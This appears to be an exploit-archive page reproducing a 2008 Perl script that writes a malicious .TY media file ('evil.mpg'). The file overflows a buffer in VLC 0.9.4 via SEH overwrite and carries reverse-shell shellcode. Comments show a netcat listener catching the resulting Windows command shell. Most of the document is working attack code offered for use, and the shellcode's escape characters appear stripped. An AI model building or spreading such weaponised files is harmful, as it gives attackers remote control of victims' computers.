VLC 0.9.4 .TY File Buffer Overflow Exploit (SEH)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : VLC 0.9.4 .TY File Buffer Overflow Exploit (SEH)
# Published : 2008-10-23
# Author : Guido Landi
# Previous Title : TUGzip 3.00 archiver .ZIP File Local Buffer Overflow Exploit
# Next Title : VUPlayer 2.49 .ASX File (HREF) Local Buffer Overflow Exploit

#!/usr/bin/perl
# 10/23/2008 k`sOSe
# Rewritten VLC 0.9.4 .TY File Buffer Overflow Exploit
# 1 - Works on Windows XP SP1, SP2, SP3 (and probably win2k)
# 2 - Works both with a local file and with a remote url
# 3 - VLC do not crash!
# 4 - Enjoy a respawing shell, even if VLC will be closed!
#
# bUGGEd htdocs # nc -l -p 443
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# e:Program FilesVideoLANVLC>exit
# exit
# bUGGEd htdocs # nc -l -p 443
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# e:Program FilesVideoLANVLC>exit
# exit
# bUGGEd htdocs # nc -l -p 443
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# e:Program FilesVideoLANVLC>

use warnings;
use strict;

# windows/exec - 141 bytes
# http://www.metasploit.com
my $shellcode =
# windows/shell_reverse_tcp - 287 bytes
# http://www.metasploit.com
# EXITFUNC=seh, LPORT=443, LHOST=127.0.0.1
 "xfcx6axebx4dxe8xf9xffxffxffx60x8bx6cx24x24" .
 "x8bx45x3cx8bx7cx05x78x01xefx8bx4fx18x8bx5f" .
 "x20x01xebx49x8bx34x8bx01xeex31xc0x99xacx84" .
 "xc0x74x07xc1xcax0dx01xc2xebxf4x3bx54x24x28" .
 "x75xe5x8bx5fx24x01xebx66x8bx0cx4bx8bx5fx1c" .
 "x01xebx03x2cx8bx89x6cx24x1cx61xc3x31xdbx64" .
 "x8bx43x30x8bx40x0cx8bx70x1cxadx8bx40x08x5e" .
 "x68x8ex4ex0execx50xffxd6x66x53x66x68x33x32" .
 "x68x77x73x32x5fx54xffxd0x68xcbxedxfcx3bx50" .
 "xffxd6x5fx89xe5x66x81xedx08x02x55x6ax02xff" .
 "xd0x68xd9x09xf5xadx57xffxd6x53x53x53x53x43" .
 "x53x43x53xffxd0x68x7fx00x00x01x66x68x01xbb" .
 "x66x53x89xe1x95x68xecxf9xaax60x57xffxd6x6a" .
 "x10x51x55xffxd0x66x6ax64x66x68x63x6dx6ax50" .
 "x59x29xccx89xe7x6ax44x89xe2x31xc0xf3xaax95" .
 "x89xfdxfex42x2dxfex42x2cx8dx7ax38xabxabxab" .
 "x68x72xfexb3x16xffx75x28xffxd6x5bx57x52x51" .
 "x51x51x6ax01x51x51x55x51xffxd0x68xadxd9x05" .
 "xcex53xffxd6x6axffxffx37xffxd0x68xe7x79xc6" .
 "x79xffx75x04xffxd6xffx77xfcxffxd0x68xf0x8a" .
 "x04x5fx53xffxd6xffxd0";

my $junk = "x41";

open(my $file, "> evil.mpg");
print $file	"xF5x46x7AxBD" .	# TIVO_PES_FILEID    
		"x00x00x00x02" .	
		"x00x02x00x00" . 	# CHUNK_SIZE    
		$junk x 8 .
		"x00x00x05x41" .	# i_map_size
		$junk x 4 .
		"x00x00x05x49" .	# SEQ table size / (i_map_size + 8) == 1
		$junk x 60	.
		"xb3x57x04x7d"  .	# jmp esp for winxp sp2.. if it fails SEH will be triggered
		$shellcode .
		$shellcode .
		$junk x (733 - length($shellcode)) .
		"xebx06x90x90" .	# jump ahead
		"x13x12x54x6a" .	# pop,pop,ret @ libvlc 0.9.4
		"xe9x16xfdxffxff". # jump back
		$junk x 129943	.
		"x05" .		# i_num_recs
		$junk x 3 .	
		"x05" .		# p_hdrs
		$junk x 1 .
		"x09" .		# subrec_type  
					#		(subrec type & 0x0f) << 8 | rec_type == 0x9c0 -> AC-3 Audio (DTivo)
		"xc0" .		# rec_type    /
		$junk x 14 .
		"x06" .		# subrec_type 
					#            	(subrec type & 0x0f) << 8 | rec_type == 0x6e0 -> Series 1 Tivo
		"xe0" . 		# rec_type    /
		$junk x 531062;

# www.Syue.com [2008-10-23]